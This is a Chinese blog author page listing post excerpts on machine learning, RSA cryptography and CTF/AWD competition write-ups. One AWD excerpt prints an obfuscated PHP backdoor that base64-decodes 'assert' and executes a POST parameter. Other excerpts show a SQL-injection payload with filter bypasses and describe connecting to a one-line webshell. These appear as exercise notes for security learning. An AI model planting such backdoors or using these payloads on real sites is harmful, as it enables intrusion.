自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(29)
  • 收藏
  • 关注

原创 机器学习记录之感知机

感知机原理参考博客:【机器学习】感知机原理详解感知机模型:f(x)=sign(w∗x+b)f(x)=sign(w*x+b)f(x)=sign(w∗x+b)signsignsign是符号函数感知机模型的其中一个超平面是:w∗x+b=0w*x+b=0w∗x+b=0www是超平面的法向量,bbb是超平面的截距这个超平面把样本分为正负两类(结合sign()sign()sign()函数)主要思路:1.输入训练数据集:编号宽度长度检验类别133正品243

2020-11-13 14:17:50 1758

原创 机器学习记录之线性回归

线性回归实现线性回归的步骤:提取特征和标签建立训练数据和测试数据使用训练数据训练模型方法一:使用方程参考老师给的代码 testLinearRegAndTrainTest.py1.建立有序的二维数据结构#第一个参数为特征,第二个参数为标签examDict={ '学习时间':[0.50,0.75,1.00,1.25,1.50,1.75,1.75,2.00,2.25, 2.50,2.75,3.00,3.25,3.50,4.00,4.25,4.50,4.75,5

2020-11-12 21:23:57 2441

原创 解决Python3 No module named ‘Crypto‘报错

解决Python3 No module named ‘Crypto‘报错进入site-packages目录,将‘crypto’目录名改为大写‘Crypto’

2020-11-07 18:17:21 2654

原创 RSA-详解dp泄漏

原理:0.基本数学公式a=kb+pa = kb + pa=kb+pamodb=pa mod b =pamodb=p1.RSA的基本公式c≡memodnc \equiv m^emodnc≡memodnm≡cdmodnm\equiv c^dmodnm≡cdmodnϕ(n)=(p−1)×(q−1)\phi(n)=(p-1)\times(q-1)ϕ(n)=(p−1)×(q−1)d×e≡1modϕ(n)d\times e \equiv1mod\phi (n)d×e≡1modϕ(n)2.dp是什么d

2020-10-23 20:44:22 5336 2

原创 解决Python3 No module named ‘Cryptodome‘报错

解决Python3ModuleNotFoundError: No module named 'Cryptodome’pip install pycryptodomex

2020-10-20 21:58:11 20952 6

原创 第三届河北省大学生网络与信息安全选拔赛-Crypto-WP

math [一血]题目:from Crypto.Util.number import *from hashlib import md5flag = "XXX"assert len(flag) == 14pad = bytes_to_long(md5(flag).digest())hack = 0for char in flag: hack+= pad hack*= ord(char) print hack#hack = 6436448535706043484886570840

2020-10-18 10:20:32 997 4

原创 picoCTF-WP

The NumbersDescription:The numbers… what do they mean?Hints:The flag is in the format PICOCTF{}a-1 b-2 c-3 d-4 e-5 f-6 g-7 h-8 i-9 j-10 k-11 l-12 m-13 n-14 o-15 p-16 q-17 r-18 s-19 t-20 u-21 v-22 w-23 x-24 y-25 z-26 大括号前数字对应的字母是PICOCTFGET FLAG!

2020-10-17 17:18:10 2646

原创 一次AWD比赛记录

BEGINssh -p 2201 ctf@118.89.227.105 备份文件以后,首先D盾扫一波使用defence上waf开始修洞.config_common.php这是一个已知后门<?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[520]); ?>base64_decode:YXN

2020-10-10 19:22:32 589 1

原创 西湖论剑2020-BrokenSystems

题目名称:BrokenSystems题目内容:Successfully modified the encryption module of the encryption system, and then it’s up to you.from Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_OAEPfrom secret import flagimport osrsa = RSA.generate(2048)public.

2020-10-09 21:56:20 601 3

原创 巅峰极客2020-tryrsa

tryrsa感谢CN!题目:from secret import e1,e2,flagfrom Crypto.Util.number import *msg = bytes_to_long("=========Hint:e1="+str(e1)+"=============")p = getPrime(512)q = getPrime(512)N = p*qprint N #92492770373119584460081987762423642921257844727187836762

2020-09-30 10:05:06 827 5

原创 BUU-Crypto-RSA刷题记录(1)

写在前面的:RSA在比赛中特别常见,不熟悉原理的话可以看看这两篇文章RSA加密算法详细解说RSA的自我介绍(1)1.RSA题目:在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=17求解出d作为flga提交方法一:使用RSA-Tool得到d方法二://import gmpy2e = 17p = 473398607161 q = 4511491phi = (p-1)*(q-1)d = gmpy2.invert(e,phi)print(d

2020-09-28 16:55:17 696

原创 四面八方-WP

题目:key1:securitykey2:information密文啊这是,骚年加油:zhnjinhoopcfcuktlj根据题目我们可以知道这是一道四方密码的题四方密码左上和右下是按照顺序的字母表,五个一行(没有q)右上和左下分别是key1和key2key1和key2需要去除重复字母后,再按剩下字母表中的字母顺序排列形式如下⬇️一一对应可以解得flag也可以转换key1和key2后使用工具网站得到flag工具????网站:http://ctf.ssleye.com/four.ht

2020-09-27 16:43:03 376

原创 BUU-Crypto刷题记录(2)

写在前面的把以前做过的题整理了一遍,要把buu的crypto都刷完目录写在前面的1.MD52.Url编码3.一眼就解密4.看我回旋踢5.摩丝6.[BJDCTF 2nd]签到-y1ng7.password8.变异凯撒9.Quoted-printable10.Rabbit11.篱笆墙的影子12.丢失的MD513.[BJDCTF 2nd]老文盲了14.Alice与Bob15.[GKCTF2020]小学生的密码学16.[BJDCTF 2nd]燕言燕语-y1ng17.[WUSTCTF2020]大数计算1.MD5

2020-09-27 10:42:40 366

原创 [WUSTCTF2020]情书-WP

题目:我给你的情书,请收好。Premise: Enumerate the alphabet by 0、1、2、… 、25Using the RSA systemEncryption:0156 0821 1616 0041 0140 2130 1616 0793Public Key:2537 and 13Private Key:2537 and 937flag: wctf2020{Decryption}根据题目,使用了RSA的加密系统那么我们可以得到N = 2537 #分解得p、q.

2020-09-26 22:03:51 1476

原创 BUU-Crypto刷题记录(1)

1.大帝的密码武器题目附件是一个叫zip的文件,加上后缀名zip,可以得到真实的附件题目:公元前一百年,在罗马出生了一位对世界影响巨大的人物,他生前是罗马三巨头之一。他率先使用了一种简单的加密函,因此这种加密方法以他的名字命名。以下密文被解开后可以获得一个有意义的单词:FRPHEVGL你可以用这个相同的加密向量加密附件中的密文,作为答案进行提交。密文:ComeChina根据题目我们能够知道加密方式是凯撒加密,解密题目中的密文得到偏移量是13,直接加密密文得到flag2.[BJDC

2020-09-26 21:02:57 1244

原创 RSA的算法介绍与数学原理

RSARSA是一种非对称加密非对称加密:Alice与Bob直接传输消息,他们生成了两把钥匙,一把公钥,一把私钥公钥给Alice,Alice使用公钥进行加密,而私钥只有Bob拥有,用来解密加密过程:在接收消息前,Bob会生成两把钥匙,并将其中的公钥给Alice,Alice使用公钥将信息加密后传递给Bob,Bob收到信息后使用私钥进行解密,得到明文。算法1.乘法:将两个质数相乘2.随机数生成算法:生成伪随机数3.Miller-Rabin测试:测试一个数是否为质数(单次测试的可信度不是特别高,需要

2020-09-24 17:34:03 794 2

原创 [NPUCTF2020]认清形势,建立信心-WP

题目:from Crypto.Util.number import *from gmpy2 import *from secret import flagp = getPrime(25)e = # Hiddenq = getPrime(25)n = p * qm = bytes_to_long(flag.strip(b"npuctf{").strip(b"}"))c = pow(m, e, n)print(c)print(pow(2, e, n))print(pow(4, e,

2020-09-10 10:16:48 710

原创 SCTF-RSA-WP

这道题的类型我第一次遇到,主要也接触到sage和LLL算法(学密码数学真的很重要)nc 121.199.14.145 12345得到三组e,n,ce0=0x1589b1732d8ce5aedf1e34a63a14bac68dcc11ee18b94e293efe58c2b77d055db463503a039472eff881b504b90e6bec1c90da3efb02c6b94770ada0a921eb5e9d19a4ca1d26b47cbaee855b72da5a79a9acb675e48c4614

2020-07-09 20:15:43 1049

原创 后浪杯CTF-WP

实验室内部举行的24小时考核赛目录CRYPTO1.CRYPTO-warmup2.佛曰3.babyRSA4.hard_crypto5.aesREVERSE1.BabyRe2.HelloCTF3.insanityMISC1.真签到2.宝可梦二代WEB1.爆破2.command???写在最后的CRYPTO1.CRYPTO-warmup题目:R1EzREVNWlZHTVpVR05KWkdVWkRLUUpXR0VaRUNNWlFHWkFUR1FaV0lFM1RDTkpZR1JEREdPSlRJSVpUQ05

2020-06-22 21:29:44 1308

原创 BUUCTF刷题记录-WarmUp

WarmUp首先检查源码看到注释,查看source.php提示查看hint.phppayloadfile=source.php%253f/../../../../../../ffffllllaaaagggg即可查看flagflag{4207264a-025e-466a-8938-908319885f82}...

2020-04-03 15:19:49 204

原创 两道sql练习题

1.注入得帅照!地址:http://123.57.240.205:4002/点击前往按钮会直接跳转到W4nder的博客,爆破可以得到一个hint(hone.php)hone.php是这样的一个界面,可以开始注入payload:id=9122399%27%20%0a%20UNion%20%0a%20SElect%20%0a%201,(SElect%20%0a%20flag%20%0a%2...

2020-03-27 23:19:01 224

原创 BJDCTF 2nd-WP

Crypto1.签到-y1ng直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ==flag:BJD{W3lc0me_T0_BJDCTF}2.老文盲了将文字转化为拼音可以知道文字就是flagflag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝}3.cat_flag...

2020-03-23 19:34:56 764

原创 四道练习题

1.http://123.57.240.205:4002/首先进行了一些常规的操作,没有得到任何信息直接访问flag.php得到flag2.http://123.57.240.205:4005//m修饰符表示正则开启多⾏匹配得到flag3.http://123.57.240.205:4003/变换非字母、数字的字符![在这里插入图片描述](https://img-bl...

2020-03-14 00:56:47 342

原创 sqli-labs闯关练习 1

less11.输入id=1,得到了ID和Password?id=12.and 1=1 和 1=2都没有报错3.加上单引号后出现报错,可能存在SQL字符注入4.用–+将‘注释掉后回显正常,说明这里是单引号字符型注入5.用order语句判断列数,order by 3没有报错,改为4的时候出现回显错误,说明这个表有3列6.将id=1改为一个数据库不存在的id,用union ...

2020-03-13 11:46:14 381

原创 2020高校战疫CTF-简单MISC

简单MISC附件里有一张图片和一个压缩包在kali里用binwalk扫一扫并分离得到ctf.txt,查看是莫斯密码解码得到压缩包密码,得到flag.txt,里面是一串base64码解码得到flagTh1s_is_FlaG_you_aRE_rigHT...

2020-03-10 09:48:55 817

原创 攻防世界新手区web-WP 01

1.view_source题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了打开题目发现右键被禁用了根据题目可以知道,flag应该是在源代码中使用开发者工具可以查看源代码,得到flag2.robots题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧首先百度了一下什么是robots协议大概...

2020-02-14 17:25:36 488

原创 一道练习题的WP-菜刀一句话

题目地址:http://www.whalwl.top:8013题目描述:菜刀一句话:http://www.whalwl.com:8013/webshell.php密码: whalwl我一开始是直接将题目的URL上传到蚁剑,但是并没有链接成功,于是访问题目中的菜刀一句话,再上传蚁剑上传成功后打开文件管理一个一个 查看,发现在init.php中有我们需要的东西按照要求连接数据库...

2019-12-19 20:42:24 413

原创 网络安全实验室(基础关刷题)-WP

网络安全实验室-基础关-WP【by:luoluo】1.key在哪里?答案在源代码里查看源代码的三种方式:直接右键检查/查看源代码、使用开发者工具、command/control+Uflag:jflsjklejflkdsjfklds2.再加密一次你就得到key啦~加密之后的数据为xrlvf23xfqwsxsqf使用Rot13编码可以得到flag我看到其他博主的wp中,有人使用凯撒...

2019-12-18 01:29:30 5246 3

原创 Linux学习记录-基本命令总结

Linuxの命令总结【1】·文件管理类命令(主要是近期学习中遇到过的)【LUOLUOの学习日记2????】·cat命令 :用于连接文件并打印相关参数-n 由 1 开始对所有输出的行数编号-b 和 -n 相似,只不过对于空白行不编号-s 当遇到有连续两行以上的空白行,就代换为一行的空白行–help 对于不懂的命令或软件安装时,都可以用–help来获取帮助-E 在每行结...

2019-11-10 17:10:26 256 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除